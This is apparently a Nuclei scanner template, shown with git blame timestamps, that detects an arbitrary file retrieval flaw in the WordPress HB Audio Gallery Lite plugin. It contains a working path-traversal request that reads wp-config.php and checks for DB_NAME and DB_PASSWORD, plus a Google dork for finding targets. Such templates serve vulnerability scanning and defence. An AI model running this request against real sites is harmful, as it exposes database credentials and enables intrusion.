2022-02-15 11:39:31 +00:00
|
|
|
id: hb-audio-lfi
|
2022-02-12 18:16:52 +00:00
|
|
|
|
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Retrieval
|
2022-02-12 18:16:52 +00:00
|
|
|
author: dhiyaneshDK
|
|
|
|
severity: high
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html
|
2022-02-15 11:39:31 +00:00
|
|
|
metadata:
|
|
|
|
google-dork: inurl:/wp-content/plugins/hb-audio-gallery-lite
|
|
|
|
tags: wordpress,wp-plugin,lfi,wp
|
2022-02-12 18:16:52 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-02-15 11:39:31 +00:00
|
|
|
part: body
|
2022-02-12 18:16:52 +00:00
|
|
|
words:
|
|
|
|
- "DB_NAME"
|
|
|
|
- "DB_PASSWORD"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|